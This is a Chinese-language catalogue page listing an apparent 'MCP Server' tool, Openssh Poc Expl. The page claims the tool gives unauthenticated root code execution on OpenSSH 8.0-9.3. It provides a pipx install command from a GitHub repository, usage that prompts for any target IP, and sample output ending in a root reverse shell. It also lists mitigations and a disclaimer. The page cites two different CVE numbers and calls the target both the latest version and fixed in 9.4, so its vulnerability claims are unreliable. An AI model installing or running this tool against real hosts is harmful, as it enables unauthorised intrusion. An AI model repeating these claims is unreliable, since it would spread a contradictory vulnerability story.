Token导航 LogoToken导航TokenDH.com
Openssh Poc Expl logo
安全风控未说明官方级别未说明来源级核验

Openssh Poc Expl

MCP Server

该工具针对OpenSSH中的缓冲区溢出漏洞(CVE-2025-1005)进行远程代码执行,适用于安全测试和教育目的。

工具数

0

提示词数

0

GitHub Stars

2

资源数

0
安全Python命令行工具

安装说明

本站只整理中文说明和来源信息,不托管安装包,也不代用户安装。

作者 / 组织

programmerdan92

提供方

programmerdan92

最后核验

2026/5/17 20:21

快速接入

先看主来源和安装命令,再打开仓库或文档;下面只保留这个条目的关键接入事实。

详细介绍

SSH缓冲区溢出漏洞-CVE-2025-2005

概述

此漏洞利用的目标是最新版本的OpenSSH中的一个关键缓冲区溢出漏洞,该漏洞允许以root权限远程执行代码。

漏洞详细信息

CVE ID:CVE-2025-1005 CVSS评分:9.8(关键)\ 受影响的软件:OpenSSH 8.0-9.3\ 攻击向量:网络\ 认证:无需

技术描述

该漏洞存在于SSH身份验证处理程序中,对用户提供的身份验证数据的边界检查不足会导致基于堆栈的缓冲区溢出。通过发送带有超大身份验证有效载荷的特制SSH数据包,攻击者可以覆盖返回地址并获得任意代码执行。

该漏洞利用ROP(面向返回编程)技术绕过ASLR和DEP/NX位保护等现代安全缓解措施。

安装

  1. 安装 pipx 通过您的发行包管理器(dnf、pacman、apt等)(通常称为 pipxpython-pipxpython3-pipx)
  1. 运行以下命令安装“ssh exploit”命令行工具
pipx install git+https://github.com/programmerdan92/openssh-poc-expl
  1. pipx会将该工具安装到主文件夹下的~/.local/bin/目录中。使用以下命令将此目录添加到路径中:

export PATH="$PATH:$HOME/.local/bin"

用法

ssh-exploit

该工具将提示:

  • 目标IP地址
  • 目标端口(默认值:22)

示例

$ ssh-exploit
Enter target IP address: 192.168.1.100
Enter target port (default 22): 22

[!] WARNING: This will attempt to exploit 192.168.1.100:22
Continue? (y/N): y

[+] Scanning target: 192.168.1.100
[+] Port 22 (SSH) is open
[+] SSH version detected: OpenSSH_8.9p1
[!] Target is vulnerable to CVE-2025-1005!

[*] Initiating buffer overflow attack on 192.168.1.100:22
[*] Crafting malicious SSH packet...
[*] Overflowing authentication buffer...
[*] Injecting shellcode payload...
[*] Bypassing ASLR protections...
[*] Escalating privileges...
[*] Establishing reverse shell...
[+] Exploit successful!
[+] Root shell obtained!

[*] Dropping into interactive shell...
root@target:~# 

缓解

  • 将OpenSSH更新到9.4或更高版本
  • 实施网络级访问控制
  • 仅使用基于SSH密钥的身份验证
  • 监视异常SSH连接模式

免责声明

此工具仅用于教育和授权的安全测试目的。未经授权访问计算机系统是非法和不道德的。

参考文献

目录标签

目录标签

安全Python命令行工具漏洞利用本地部署远程代码执行安全测试缓冲区溢出SSH

接入字段

传输方式(transport,传输协议)

未说明

鉴权方式(authType,认证方式)

none

工具数量(toolCount,工具数)

0

资源数量(resourceCount,资源数)

0

提示词数量(promptCount,提示词数)

0

权限和风险

未说明none部署方式未说明

接入前请确认传输方式、认证方式和部署位置,并根据实际工具能力限制访问范围。

安装前确认

不要直接授予不必要的文件、网络或账号权限;先核对安装命令和配置内容。

仍需确认:installCommand

来源信息

继续浏览同类 MCP